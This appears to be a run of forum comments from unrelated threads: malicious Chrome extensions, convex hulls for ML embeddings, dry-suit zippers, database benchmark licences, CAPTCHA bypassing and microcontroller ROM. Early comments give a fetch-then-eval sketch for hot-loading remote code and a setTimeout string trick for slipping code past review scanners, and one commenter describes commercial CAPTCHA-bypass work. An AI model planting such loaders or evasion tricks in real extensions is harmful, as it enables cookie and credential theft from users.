
Chrome has a browser extension API which allows plugins to access all cookies, but its use is considered suspicious and a red flag; an extension which uses it would generally get caught during initial review. However, Chrome extensions are also allowed to “hotload” portions of their own code/scripts from external 3rd party servers.

So an extension will seem benign when Google initially checks it as part of its submission to the Chrome Web Store. Then, later, the externally hosted “3rd party” script is replaced with a different, malicious script. The malicious extension carries on stealing cookies, credentials, and fingerprints until someone reverse engineers it and reports it to Google.
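
As a rough sketch of that “hotloading” pattern (not any specific extension’s code; the URL and function name here are hypothetical placeholders), the mechanism can be as simple as fetching a script and executing it, so the payload can be swapped server-side at any time:

    // Sketch of the remote "hotloading" pattern described above.
    // The URL is a hypothetical placeholder: at review time it serves
    // harmless code, and the operator can later swap in a malicious payload.
    async function loadRemoteModule() {
        const resp = await fetch('https://cdn.example.com/plugin-module.js');
        const code = await resp.text();
        // Indirect eval executes code that was never part of the packaged extension.
        (0, eval)(code);
    }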

Google will not always recognize the issue immediately, because the 3rd-party malicious code is not strictly “part of” the extension. So there’s a bit of a song and dance while the person who reversed it convinces Google’s reviewers that “yes, this really is malicious, you need to analyze the third-party code that loads later.” Google eventually takes it down after a semi-involved back-and-forth in which the exasperated white-hat Good Samaritan provides extensive documentation and video walk-throughs.


Remote loading of code has been banned by Google and Mozilla for several years now. The automated review tools pick up script injection and eval() calls. Unless you can craft something unique, you’re not going to get past the automated review.

I’m guessing the malware is something else besides a browser extension.


Stuff like setTimeout accepts strings too. I wonder how good those scanners are at detecting a scheme where an initially innocent function is later overwritten with a string and then invoked via a timeout; it can get fairly indirect:

    let harmless = { func: function () { }, harmlessExternallyLoadedString: '' };
    let toAccess = 'func';
    // do stuff that seems legit
    if (true) {
        // block-scoped `let` shadows the outer variable, so after this block
        // the outer toAccess still points at 'func'
        let toAccess = 'harmlessExternallyLoadedString';
    }
    // overwrites harmless.func with a string -- imagine this being a fetch request
    harmless[toAccess] = 'alert(1);';
    // later on: setTimeout evaluates the string as code
    setTimeout(harmless.func, 1);

Now imagine that the logic for what toAccess gets set to is obfuscated by a more complex logic tree, and that the example is a bit less contrived.


Seems like you speak from experience.

Do you have any specifics to share?


I've been trying to use convex hulls to explore ML embedding spaces. However, the dimensionality (768+ dimensions) seems to crash established options like QHull[0], even with 64 GB of RAM (and 16 CPU cores, although libqhull is not multi-threaded).

Are there more appropriate algorithms for finding convex hulls where dimensions are ~768? Or any parallelized / GPU-optimized options that I should look into?

0: http://www.qhull.org


> Qhull does not support triangulation of non-convex surfaces, mesh generation of non-convex objects, medium-sized inputs in 9-D and higher, alpha shapes, weighted Voronoi diagrams, Voronoi volumes, or constrained Delaunay triangulations,

You are going to have to roll your own.

One trick you can use is that most convex hull algorithms chase O(n lg n). That lg(n) implies a branching step, which lowers efficiency on GPUs. Your coefficients in high dimensions likely mean an O(n^2) branchless algorithm could run faster on a GPU.

Cull points aggressively too, for what little that is worth in high dimensions.

I found https://www.sciencedirect.com/science/article/abs/pii/S01678... which looks like it could be a starting point.

The real problem is that in dimensions that high, the point set probably already is the hull and all this is a zero signal gain operation.
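
One cheap way to check that empirically before committing to a full hull computation is to project the points onto random directions: for points in general position, each direction’s maximizer is guaranteed to be a hull vertex, so the number of distinct maximizers gives a lower bound on how much of the set is already “all hull”. A minimal sketch in plain JavaScript (the inner loop is just dot products, which is also what makes the idea GPU-friendly):

    // Lower-bound the number of convex hull vertices by sampling random
    // directions; each direction's argmax is an extreme point (assuming
    // points in general position, so ties have probability zero).
    const dot = (a, b) => a.reduce((s, x, i) => s + x * b[i], 0);

    function randomGaussian() {
        // Box-Muller transform
        const u = 1 - Math.random(), v = Math.random();
        return Math.sqrt(-2 * Math.log(u)) * Math.cos(2 * Math.PI * v);
    }

    function randomDirection(d) {
        // Normalized Gaussian vector: uniformly distributed direction on the sphere.
        const g = Array.from({ length: d }, randomGaussian);
        const norm = Math.sqrt(dot(g, g));
        return g.map(x => x / norm);
    }

    function hullVertexLowerBound(points, trials = 10000) {
        const vertexIndices = new Set();
        const d = points[0].length;
        for (let t = 0; t < trials; t++) {
            const u = randomDirection(d);
            let best = 0, bestScore = dot(points[0], u);
            for (let i = 1; i < points.length; i++) {
                const score = dot(points[i], u);
                if (score > bestScore) { best = i; bestScore = score; }
            }
            vertexIndices.add(best);
        }
        return vertexIndices.size; // distinct extreme points found so far
    }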


> The real problem is that in dimensions that high, the point set probably already is the hull and all this is a zero signal gain operation.

Well, if I have 10,000 samples from a 768-dimensional volume, most of those points will probably be inside the volume, and not per se vertices of the hull.

I’m very comfortable rolling my own solution, so thank you for pointing me to Jarvis’ algorithm!


So, about that. Do the math on how many faces a 768-simplex has.


Revisiting this. Isn't it a bit of a red herring to enquire about the number of 2-faces that an n-simplex has? It still only has n+1 vertices. A 768-simplex may have 75.5 million faces but it will still only have 769 vertices which completely define the shape. So why would I expect a large number of the other >90% of the 10,000 samples I have to lie on the surface, rather than inside the interior volume?

To be more direct, what's the specific relevance of bringing up the number of 2-faces that an n-simplex has?


So you won't be able to define a hull at all without (n+1) points. He has 10k points, so that sounds like a lot, relatively speaking.

The definition of a convex hull is, put generally, the set of points that define faces such that every other point is either on a face or on the "inside" of it (the side where the mean point lies).

To test if a point is inside that simplex hull, you need to check every one of those faces. But that isn't the problem.

Every face is a "filter" that all the other points have to pass. Moving beyond the simplex, the number of faces that need to "accept" every other point scales much faster in higher dimensions. The odds of that aren't horribly clear; you are right in other comments to call out that the structure of points in this context is by definition not independent or random, but you need enough structure to get around the fact that high-dimensional hulls are basically all surface.
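
As a sketch of that "filter" idea (assuming the facets have already been computed and are given as outward normals with offsets, which is itself the expensive part in 768 dimensions):

    // Half-space membership test: a point is inside the hull only if it
    // passes every facet's "filter". Each facet is assumed to be given as
    // an outward normal and an offset, so interior points satisfy
    // dot(normal, x) <= offset for all facets.
    const dot = (a, b) => a.reduce((s, x, i) => s + x * b[i], 0);

    function insideHull(point, facets, eps = 1e-9) {
        // One failed half-space test is enough to reject the point.
        return facets.every(f => dot(f.normal, point) <= f.offset + eps);
    }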


I believe the answer is:

C(n+1, k+1) = (n+1)! / ((k+1)! * (n-k)!) where n=768 and k=2

Or about 75.5 million triangular faces. Which explains a lot. Thanks for that.
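
For anyone checking the arithmetic, a small sketch of the count (the function name and the multiplicative formulation are just my own illustration):

    // Number of k-dimensional faces of an n-simplex: C(n+1, k+1).
    // Computed multiplicatively so every intermediate value stays an integer.
    function kFacesOfSimplex(n, k) {
        let c = 1;
        for (let i = 1; i <= k + 1; i++) {
            c = (c * (n - k + i)) / i; // c equals C(n-k+i, i) after each step
        }
        return c;
    }

    console.log(kFacesOfSimplex(768, 2)); // 75497344 triangular (2-)faces, ~75.5 million
    console.log(kFacesOfSimplex(768, 0)); // 769 vertices, matching the point above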


Depends on how complicated the branches are. One solution to branching on GPUs is to compute every branch, which is only a constant-factor increase in computation. I find it hard to believe there are many cases where n^2 would be faster than n lg(n) for large n.


Due to the curse of dimensionality, more of the points are pushed toward the hull in higher dimensions. So I don't think this is likely to be very effective as a data exploration technique as stated.

There may be more general expected-value formulas for higher dimensions; I only know of examples in two dimensions offhand: https://blogs.sas.com/content/iml/2021/12/06/expected-number....

There may be smarter reduced-form embeddings, though, to make pretty pictures, e.g. https://www.youtube.com/watch?v=sD-uDZ8zXkc&ab_channel=Cynth....


I wonder if the curse of dimensionality would necessarily apply. In general, yes, most of the points in an n-dimensional volume lie near the surface in high-dimensional spaces. While true, this seems mostly to be an issue when sampling random, independent points from the space. For an ML problem, all of the points are likely dependent on a few underlying processes.

Wikipedia has more on this: https://en.wikipedia.org/wiki/Curse_of_dimensionality

> This is often cited as distance functions losing their usefulness (for the nearest-neighbor criterion in feature-comparison algorithms, for example) in high dimensions. However, recent research has shown this to only hold in the artificial scenario when the one-dimensional distributions are independent and identically distributed.[13] When attributes are correlated, data can become easier and provide higher distance contrast and the signal-to-noise ratio was found to play an important role, thus feature selection should be used.

> More recently, it has been suggested that there may be a conceptual flaw in the argument that contrast-loss creates a curse in high dimensions. Machine learning can be understood as the problem of assigning instances to their respective generative process of origin, with class labels acting as symbolic representations of individual generative processes. The curse's derivation assumes all instances are independent, identical outcomes of a single high dimensional generative process. If there is only one generative process, there would exist only one (naturally occurring) class and machine learning would be conceptually ill-defined in both high and low dimensions. Thus, the traditional argument that contrast-loss creates a curse, may be fundamentally inappropriate. In addition, it has been shown that when the generative model is modified to accommodate multiple generative processes, contrast-loss can morph from a curse to a blessing, as it ensures that the nearest-neighbor of an instance is almost-surely its most closely related instance. From this perspective, contrast-loss makes high dimensional distances especially meaningful and not especially non-meaningful as is often argued.


Check out the TIZIP SuperSeal zipper -- it was used on some "dry suits" I wear for offshore sailboat racing in cold-water environments and is truly waterproof. It's advertised as waterproof up to a 700 millibar pressure differential, which is equivalent to about 23 feet of water depth. This zipper does require maintenance in the form of regular lubrication with, for example, a food-grade silicone grease like the ones used for slushie/daiquiri machines.

I looked into getting it worked into bags from Montrose Rope and Sail in Scotland when I worked in offshore industrial environments, but they don't have the equipment to do the necessary "vinyl welding", so you'd have to buy the bag without zippers and then find someone else who could do that welding.


> Spending 8k-ish to build a product demo for my friends rich uncle is too uphill for me to risk.

That’s something I could potentially fund. No equity, just pro-bono / repay if it works out. Feel free to reach out and chat if it’s a dream you believe in.

But $250k from this might go a lot further.


I could definitely get off the ground for much less, but having rent/bills covered to go all-in, plus capital for speed to market / competitive advantage, is real nice. As long as I have legally maximized control of the charter considering the investment, I'm happy to give up future cash. To me, realized gains are a byproduct of viably bringing the product to the world. But doing the thing is the purpose.

And it would free up my time to focus on scaling and experimenting instead of assembling.

I'm genuinely taken aback by that offer, and I'll be reaching out to your email with an introduction. Thank you for reaching out.


Could you pirate the database, then hide behind the Fifth Amendment to avoid revealing that you're a pirate, while simultaneously asserting that you never agreed to any EULA? I'm not sure what the legal rights are here.

I'm certain someone in say, China or Russia, could pirate the database and run benchmarks on it with no repercussions. Surprising that this isn't a business model for an overseas technology analyst firm.


> Surprising that this isn't a business model for an overseas technology analyst firm.

How much are you willing to pay for a legally dubious benchmark?


Does anyone ever pay for benchmarks?

Or are they web content used to lure in new contracts?


It's much simpler than that.

Person A installs the database on a shared or to-be-sold computer; the installation process makes a copy and so requires a license, and Person A "agrees" to the EULA.

Person B then runs benchmarks on said computer, which does not require a license because no copy is being made, and publishes the results.

The only flaw in this is that Oracle will send its mafia enforcers to break your kneecaps despite not having a valid legal case. So you'll lose even if you technically can win.


The Fifth only protects the innocent. It's a fun twist of this amendment: if you are guilty, you do not have a right to remain silent.


That's true if you've been convicted and sentenced for the crime regarding which your testimony would be self-incriminating, but not otherwise. Someone who has committed the crime but hasn't yet been convicted and sentenced still falls under its protection, assuming there isn't a grant of immunity from prosecution to force the testimony anyway.


Other way around, sadly:

https://en.m.wikipedia.org/wiki/Haynes_v._United_States

Convicted felons are exempt from the portion of the National Firearms Act that requires that machine guns (and other NFA items like short-barreled shotguns) be registered, as registration would violate their 5th Amendment rights.


Huh, that is one of the most interesting Supreme Court decisions I think I've read. I kind of agree with it in a text-of-the-law sense.

I would be very curious to see that logic hold up in court these days. They got Al Capone on tax evasion, for instance, but wouldn't paying taxes on his ill-gotten funds have been incriminating?


And in any sane legal system, you are innocent until proven guilty.


For web scraping specifically, I’ve developed key parts of commercial systems to automatically bypass reCAPTCHA, Arkose Labs (Fun Captcha), etc.

If someone dedicated themselves to it, there’s a lot more that these solutions could be doing to distinguish between humans and bots, but it requires true specialized talent and larger expenses.

Also, for a handful of the companies which make the most popular captcha solutions, I don’t think the incentives align properly to fully segregate human and bot traffic at this time.

I think we're still very much picking at the lowest-hanging fruit, both for anti-bot countermeasures and anti-anti-bot counter-countermeasures.

Personally, I believe this will finally accelerate once AIs can play computer games via a camera, keyboard, and mouse, and when successors to GPT-3 / PaLM can participate well in niche discussion forums like Hacker News or the Discord server for Rust.

Until then it’s mainly a cost filter or confidence modification. As long as enough bots are blocked so that the ones which remain are technically competent enough to not stress the servers, most companies don’t care. And as long as the businesses deploying reCAPTCHA are reasonably confident that most of the views they get are humans (even if that belief is false), Google doesn’t have a strong incentive to improve the system.

Reddit doesn’t seem to care much either. As long as the bots which participate are “good enough”, it drives engagement metrics and increases revenue.


Your service helped me immensely when I was getting started with machine learning, but had no budget and just a laptop. For me, everything “just worked”, and I learned a ton about Docker and created my own system to handle the ephemeral nature of the computing systems by automatically backing up training checkpoints, programmatically finding the next best “deal”/“bid” and resuming the training on a different instance.

Was very very cool, and I generally recommend it to anyone I come across who has modest needs (<25 GPUs).

I did find the throughput was not always accurate at the time. This was about 2 years ago. It was fairly frequent that a listing would say "300" to "1000" Mbps up/down, but would actually get an order of magnitude less to any of the big cloud services (GCP, AWS, etc.). It wasn't important to me that the speed was low, but it was important that it didn't match what was "advertised". For certain workloads I would have gladly paid more for higher throughput, but that's not really an option when the listings couldn't be fully trusted.

I also heard there may be some opportunities to market your technology/platform for "on-prem", "on-demand" GPU clouds for large enterprises, so that a pool of corporate GPUs could be efficiently used and accurately billed to a variety of internal stakeholders. It could improve asset utilization for capital-intensive on-premise GPUs.


Amazon Sidewalk, actually. Should prove cheaper and work near any dense housing.


Indeed. The old MacAddict magazine shipped a CD with every issue. The CD contained loads of shareware/games/utilities/productivity software etc.

The CD also had a folder named "updates and patches" where you could find installers for the latest bug fixes of the most popular MacOS software.

CDs bundled with monthly magazines were a valid conduit for getting patches to users at the time.


Some Xbox 360 games shipped with console updates as well, which had to be applied before you could play the game.


Correct.

To be pedantic, there is a built-in 16 kB ROM starting at address 0x00000000, with Raspberry Pi's open-source BootROM burned into it at the time the silicon is manufactured. There's no publicly known way to write to this. It's technically "non-volatile storage", but it's not useful to anyone other than Raspberry Pi/TSMC.


There's no privately known way of writing to it either. Mask ROMs are set in stone.

